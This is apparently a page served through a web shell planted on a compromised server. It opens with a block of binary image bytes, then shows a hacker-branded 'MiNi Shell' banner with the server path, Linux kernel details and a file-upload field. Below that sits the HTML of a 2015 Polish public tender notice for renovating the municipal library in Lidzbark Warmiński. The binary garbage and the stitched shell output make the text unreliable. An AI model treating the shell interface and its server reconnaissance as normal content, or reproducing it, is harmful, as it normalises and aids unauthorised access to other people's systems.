JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150529/129458-N-2015.html

<p class="kh_header"><b>Lidzbark Warmiński: Wykonanie remontu Miejskiej  Biblioteki  Publicznej im. M. Kromera                                w  Lidzbarku  Warmińskim</b><br>
<b>Numer ogłoszenia: 129458 - 2015; data zamieszczenia: 29.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Biblioteka Publiczna im.M.Kromera , ul. Ratuszowa 4, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 89 767 30 25, faks 89 767 62 43.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu Miejskiej  Biblioteki  Publicznej im. M. Kromera                                w  Lidzbarku  Warmińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu Miejskiej  Biblioteki  Publicznej  im. M. Kromera  w  Lidzbarku  Warmińskim  obejmującego  swoim  zakresem  dwa następujące  etapy:
1) I  etap - rozbudowa  instalacji  Systemu  Sygnalizacji  Pożaru  w  istniejącym,    
    sąsiednim  budynku po  byłym  Urzędzie  Miejskim (ul. Ratuszowa 5),  na budynek  
    Miejskiej  Biblioteki  Publicznej  w  Lidzbarku  Warmińskim  (ul. Ratuszowa 4), 
    w  ramach  połączonych  stref pożarowych  obu  budynków.
	2) II   etap - renowacja  elewacji  budynku  Miejskiej  Biblioteki  Publicznej                          
         w  Lidzbarku  Warmińskim  zgodnie  z  zaleceniami  konserwatora  zabytków. 
2.  W budynku Miejskiej Biblioteki Publicznej trwa remont rozpoczęty na podstawie  
     decyzji  nr Lim/7/2014  udzielającej pozwolenia  na  prowadzenie  prac  w  budynku  
     wydanej  w  dniu  09.01.2014 r., znak  BiA.6740.336.2013  przez  Starostę  
     Lidzbarskiego. 
          Wykonawca  zobowiązany jest do wykonania  przedmiotu zamówienia w sposób nie                                
          kolidujący z realizowanymi robotami budowlanymi. Kolejność wykonywania robót 
          budowlanych wewnątrz  budynku, należy uzgadniać z kierownikiem budowy 
          realizowanego zadania.
          Wykonawca  zobowiązany jest również  do pokrycia  wszelkich  strat wynikających               
          z jego winy, jeśli powstaną  na zadaniu już realizowanym. Spory, które mogą 
          wyniknąć z nieporozumień  pomiędzy wykonawcami, rozstrzygnie Inspektor Nadzoru  
          Inwestorskiego.
3. Zakres przedmiotu zamówienia obejmuje:
Etap I :
- rozbudowa  instalacji  Systemu  Sygnalizacji  Pożaru  (SSP), przez  połączenie  	  sąsiedniego  budynku  po  byłym  Urzędzie  Miasta  w  jedną  strefę  pożarową,
- instalacja nowej  centrali  w  miejscu  istniejącej centrali  sygnalizacji,
- montaż  siłowników  i  klap  przeciwpożarowych  na  istniejącej  wentylacji                               
  i połączenie w  nowoprojektowaną  instalacją  SSP,
- wykonanie  zabudowy  siłowników  płytą  gkf 2xpłyta OEI60  wraz  z  obróbką  	  malarską, 
          - scalenie  całości  kolorystycznie  z  istniejącą  kolorystyką  ścian.
Etap II:
- wykonanie  renowacji  wypraw  elewacyjnych  polegających  na: usunięciu  tynków  
  osłabionych  lub  odspojeń  od  podłoża, naprawy  tynków, gruntowanie i 
  malowanie zgodnie z  zaleceniami  konserwatora  zabytków,
- wykonanie  zabezpieczenia  przeciwpożarowego  na  elewacji  zachodniej (tylnej)    
  jako  występ  o  wymiarach  0,3m x0,3 m zapobiegający  rozprzestrzenianiu  się  
  ognia,
- wykonanie  napisu  na  frontowej  elewacji  o  treści  BIBLIOTEKA oraz  logo  	  bibliotek  publicznych,
- wymiana parapetów zewnętrznych,
oraz wykonanie pozostałych robót, zgodnie z dokumentacją projektową i specyfikacją
techniczną wykonania i odbioru robót budowlanych, które załączono do niniejszej 
specyfikacji istotnych warunków zamówienia.
3. Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową,                                 
    ze specyfikacją techniczną wykonania i odbioru robót budowlanych, z obowiązującymi 
    przepisami, z aktualną, posiadaną najnowszą wiedzą techniczną oraz  z zasadami 
    doświadczenia zawodowego.
4. Określone w SIWZ nazwy materiałów lub produktów, podane znaki towarowe lub 
    pochodzenie, mają na celu określenie wymaganych parametrów technicznych lub 
    standardów jakościowych materiałów  lub produktów, a Zamawiający, zgodnie z art. 29 
    ust. 3 ustawy Prawo zamówień publicznych, dopuszcza stosowanie materiałów lub 
    produktów  równoważnych o parametrach technicznych i wymogach jakościowych nie 
    niższych niż podane w SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne 
    opisywanym przez Zamawiającego, obowiązany jest wykazać, że oferowane materiały  lub 
    produkty spełniają wymagania określone przez Zamawiającego. Na wykonawcy ciąży 
    obowiązek udowodnienia w każdym czasie, iż proponowane materiały lub produkty  są 
    równoważne. W przypadku składania oferty,  w których wykonawca proponuje materiały   
    lub produkty równoważne, do oferty należy dołączyć w formie tabeli  wykaz 
    proponowanych materiałów lub produktów równoważnych, wraz z dokumentami 
    stwierdzającymi w sposób jednoznaczny ich równoważność. Brak wskazania w ofercie 
    propozycji zastosowania materiałów lub produktów równoważnych oznaczać będzie, że 
    przedmiot zamówienia zostanie wykonany przy zastosowaniu materiałów lub produktów 
    przyjętych w SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium  w wysokości:    
    3 000,00 PLN (słownie: trzy tysiące złotych), na cały okres związania ofertą, który wynosi 
    30 dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania 
    ofert.
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późń. zm.).
4. Miejsce i sposób wniesienia wadium.
a)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 
38 1160 2202 0000 0000 6193 1807, z dopiskiem: Wadium - Remont MBP. Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku  przed terminem składania ofert. Kopię potwierdzenia wniesienia wadium poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię 
     dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce, oryginał tego dokumentu. Nie 
     bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie z prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą.
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego                          z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji 
    Istotnych Warunków Zamówienia, zostanie wykluczony z postępowania zgodnie 
    z art. 24 ust. 2 pkt 2 ustawy - Prawo zamówień publicznych. 
7.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
     została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz 
    wniesieniu zabezpieczenia należytego wykonania umowy.
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę 
    przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww.  
      warunku udziału w postępowaniu.
      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży 
      oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 
      1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
      że w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres 
      prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty 
      budowlane polegające na przebudowie lub remoncie budynku wpisanego do rejestru 
      zabytków, każda o wartości nie mniejszej niż 70 000,00 PLN brutto (słownie:
      siedemdziesiąt tysięcy złotych brutto) oraz załączy dowody dotyczące najważniejszych 
      robót, określających czy roboty te zostały wykonane w sposób należyty oraz
      wskazujących, czy zostały wykonane zgodnie  z zasadami sztuki budowlanej 
      i prawidłowo ukończone.

      Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą  
      wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww.  
      warunku udziału w postępowaniu.
      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży 
      oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 
      1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
    że  dysponuje następującymi osobami, które będą uczestniczyć  w wykonaniu 
     zamówienia:
    a) co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami          w specjalności konstrukcyjno-budowlanej bez ograniczeń, wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane bez ograniczeń, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz doświadczenie w sprawowaniu funkcji kierownika budowy lub kierownika robót w realizacji co najmniej 2 robót budowlanych polegających przebudowie lub remoncie budynku wpisanego do rejestru zabytków, każda o wartości nie mniejszej niż 70 000,00 PLN brutto (słownie: siedemdziesiąt tysięcy złotych brutto) oraz co najmniej 2 -letnią praktykę zawodową odbytą na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków,  
b) co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub  odpowiadające im ważne uprawnienia budowlane, które zostały wydane na  podstawie wcześniej obowiązujących przepisów oraz doświadczenie w sprawowaniu funkcji kierownika budowy lub kierownika robót                                       w realizacji co najmniej jednej roboty budowlanej.

Osoby, o których mowa wyżej  i które uzyskały kwalifikacje do wykonywania
Samodzielnych funkcji technicznych w budownictwie w Rzeczypospolitej Polskiej,
muszą być wpisane na listę członków właściwej izby samorządu zawodowego                        
i ubezpieczone od odpowiedzialności cywilnej, co daje prawo wykonywania
samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia
15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa 
(t.j. Dz.U. z 2014 r., poz. 1946). Oprócz osób, o których mowa wyżej, w wykonaniu
zamówienia mogą wziąć udział również osoby będące obywatelami państw
Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, spełniający
wymagania zawarte w ustawie  z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U.           
z 2013 r., poz. 1409, z późn. zm.), a w szczególności w art. 12a oraz w ustawie z dnia
18 marca 2008 r. o  zasadach uznawania kwalifikacji zawodowych nabytych 
w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, z późn. zm.).
Wymienione w ust. 1 pkt. 1.3 osoby nie wyczerpują wymagań dla rzetelnego
wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne
wymagania Zamawiającego. Kompletne wynagrodzenie całego personelu oraz
wszelkie koszty związane z obsługą muszą być zawarte w cenie oferty Wykonawcy.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku

      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
      że:
1) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą 
    niż 120 000,00 PLN (słownie: sto dwadzieścia tysięcy złotych).
	2) posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 
    60 000,00 PLN (słownie: sześćdziesiąt tysięcy złotych).
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
